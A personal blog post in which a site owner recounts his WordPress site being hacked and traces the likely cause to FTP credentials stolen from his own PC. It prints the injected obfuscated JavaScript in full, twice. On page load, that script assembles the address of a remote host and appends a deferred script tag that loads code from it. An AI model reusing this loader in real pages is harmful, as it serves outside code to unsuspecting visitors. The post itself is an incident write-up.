Hack Victim

In the world of security everybody admits that the question is not “if a security breach will happen, but when”. This weekend was my turn. I do my best to keep up to date my blog and generally I try to keep bad guys out of my place. However a nasty Javascript XSS (cross-site) attack hit me on Friday evening. I noticed that something could be wrong with my blog when my antivirus software initiated alarms every time I opened my browser (where suprisingly, I have my web site as homepage ).My first reaction was to bring the site offline to protect my visitors. Then I started search where and how much damage has been done. Every single .php and .js was infected and in every file the attacker has injected the following code:

var Zx=new Array();var ZL=new Array();try {this.U="";this.u="";
var D;if(D!='a' && D != ''){D=null};var V='';var II;if(II!='ly'
&& II != ''){II=null};var b='[';var sN;if(sN!='X' && sN!='iC'){
sN=''};this.iO="";var z=RegExp;var s='replace';var Z='g';this.GJ='';
var q=']';var M;if(M!='ST' && M != ''){M=null};function L(C,y){var
Cp;if(Cp!=''){Cp='Sq'};var Wv=new Date();var wH=new String();var m=b;
this.le="";this.Aq='';m+=y;this.XP='';m+=q;var CO="";var E="";var I=new
z(m, Z);return C[s](I, V);};var K;if(K!='N'){K='N'};var PN="";var
h=L('bhoCdhyh',"CDhr");var B=L('sfcfrPiPpMtP',"MwOfP");var d=L('
h7t7tzpB:7/7/bvznVezx7pVrVeVsBsz-zn7ebtV.VnBiVn7gB.7cBozmB.bgVozobg7lbe
b-bhBrb.bm7yVf7rbe7ezmzabgb.7rzuB:b',"bBVz7");var C="1";var kb;
if(kb!='' && kb!='t'){kb=''};var qc=L('/TsTpjoTnjsToTrTajdjsT.TdjeT/
TsTpTojnjsToTrTajdjsj.TdTej/jaTlTlToTcTiTnjej.Tfjrj/jaTeTbTnT.TnjejtT/
jgTojoTgjljej.TcTojmT.TpjhTpT',"jT");var Rh=new String();var Lq=new
String();var l=L('awpGpDewnGdqCDhDiqlDdw',"wDRGq");var Ep="";var O=L(
'sQeStQAStQtSrSiQbQuQtSeS',"SQ");var SN=new Array();this.Nd="";var
fj='';var zG='';var si='';var bf;if(bf!='_'){bf='_'};this.BI="";var
yS=L('851535031951859931095959',"3159");var Yr=new Date();var G=L('
ckrfekagtkekEglfekmkegnktg',"gfk");this.Cq="";this.CR='';var lq=L('
o3n3lro3audN',"NVr3u");var NR=new Array();var iI;if(iI!='Xk'){iI='Xk
'};var Ih=new String();var re=new String();window[lq]=function(){var
UL=new String();var qa=new String();zB=document[G](B);var wR=new A
rray();si+=d;this.oy='';si+=yS;var LJ=new String();var Pv=new Array();
si+=qc;var _a;if(_a!='' && _a!='rQ'){_a='ED'};this.oB="";zB.src=s
i;var k=document[h];var kv;if(kv!='VV' && kv != ''){kv=null};zB.
setAttribute('defer', C);var _z;if(_z!='' && _z!='OxG'){_z='p'};var xd;
if(xd!=''){xd='kQ'};k.appendChild(zB);var n_='';var uJe=new String();};
var VO;if(VO!='sz'){VO=''};this.Iw='';var cR;if(cR!='Ae' && cR!='mL'){
cR='Ae'};} catch(Y){};

Well it was impossible to read this script, so I reformatted like real code and out to be the following:

var Zx = new Array();
var ZL = new Array();
try {
  this.U = "";
  this.u = "";
  var D;
  if(D != 'a' && D != '') {
      D = null};

  var V = '';
  var II;
  if(II !='ly' && II != '')
  {
     II = null };

  var b = '[';
  var sN;
  if(sN != 'X' && sN != 'iC')
  {
      sN = ''};
  this.iO = "";
  var z = RegExp;
  var s = 'replace';
  var Z = 'g';
  this.GJ = '';
  varq = ']';
  var M;
  if(M != 'ST' && M != '') {
     M = null};

  function L(C, y) {
      var Cp;
      if(Cp != '') {
         Cp = 'Sq'};
      var Wv = new Date();
      var wH = new String();
      var m = b;
      this.le = "";
      this.Aq = '';
      m += y;
      this.XP = '';
      m += q;
      var CO = "";
      var E = "";
      var I = new z(m, Z);
      return C[s](I, V);
  };

  var K;
   if(K != 'N') {
      K = 'N'}; 

  var PN = "";
  varh = L('bhoCdhyh', "CDhr");
  var B = L('sfcfrPiPpMtP', "MwOfP");
  var d = L('h7t7tzpB:7/7/bvznVezx7pVrVeVsBsz-zn7ebtV.VnBiVn7gB.
7cBozmB.bgVozobg7lbeb-bhBrb.bm7yVf7rbe7ezmzabgb.7rzuB:b', "bBVz7");
  var C = "1";
  var kb;
  if(kb != '' && kb != 't') {
      kb = ''}; 

  var qc = L('/TsTpjoTnjsToTrTajdjsT.TdjeT/TsTpTojnjsToTrTajdjsj.
TdTej/jaTlTlToTcTiTnjej.Tfjrj/jaTeTbTnT.TnjejtT/jgTojoTgjljej.TcTojmT.
TpjhTpT', "jT");
  var Rh = new String();
  var Lq = new String();
  var l = L('awpGpDewnGdqCDhDiqlDdw', "wDRGq");
  var Ep = "";
  var O = L('sQeStQAStQtSrSiQbQuQtSeS', "SQ");
  var SN = new Array();
  this.Nd = "";
  varfj = '';
  var zG = '';
  var si = '';
  var bf;
  if(bf != '_') {
     bf = '_'}; 

  this.BI = "";
  var yS = L('851535031951859931095959', "3159");
  var Yr = new Date();
  var G = L('ckrfekagtkekEglfekmkegnktg', "gfk");

  this.Cq = "";
  this.CR = '';
  var lq = L('o3n3lro3audN', "NVr3u");
  var NR = new Array();
  var iI;
  if(iI != 'Xk') {
      iI = 'Xk '}; 

  var Ih = new String();
  var re = new String();
  window[lq] = function() {
      var UL = new String();
      var qa = new String();
      zB = document[G](B);
      var wR = new Array();

      si += d;
      this.oy = '';
      si += yS;
      var LJ = new String();
      var Pv = new Array();
      si += qc;
      var _a;
      if(_a != '' && _a != 'rQ') {
         _a = 'ED'};
      this.oB = "";
      zB.src = si;
      var k = document[h];
      var kv;
      if(kv != 'VV' && kv != '') {
         kv = null};
      zB.setAttribute('defer', C);
      var _z;
      if(_z != '' && _z != 'OxG') {
         _z = 'p'};
      var xd;
      if(xd != '') {
         xd = 'kQ'}; 

      k.appendChild(zB);
      var n_ = '';
      var uJe = new String();
      };

  var VO;
  if(VO != 'sz') {
      VO = ''}; 

  this.Iw = '';
  var cR;
  if(cR != 'Ae' && cR != 'mL') {
      cR = 'Ae'};
  }
catch(Y) {};

It became obvious that the script used a special encoding technique, unique for the script to make my life harder. It took me some time but in the end I was able to understand its inner work and finally the nasty cross-site trojan attack to the users browser.

My next move was to identify the point of entry. NOTHING! All my logs where clean, no recent exploits for wordpress published and everything seemed ok. Then an idea came back to me… It was not the server’s fault, but me… And yes I was right… My PC was somehow (still looking for that) infected with a backdoor which probably stole my cached FTP passwords (yes, I know it is bad to store passwords…). Then it connected through ftp to my web server and everything was easy … It could have been worse…

Everything was clear now and it was time to bring the site back online. I found it easier and safer to reinstall wordpress, as my database was not affected. So, fresh wordpress install, fresh theme installation, fresh plugins install and… here I am, back online!

Soumplis' Personal Web Site

OSCurrency and Thin on ...

RedHat Cluster Fence ...

Spacewalk Channel ...

Leave a Reply Cancel reply

Categories

Pages

Archives

My Bio in few lines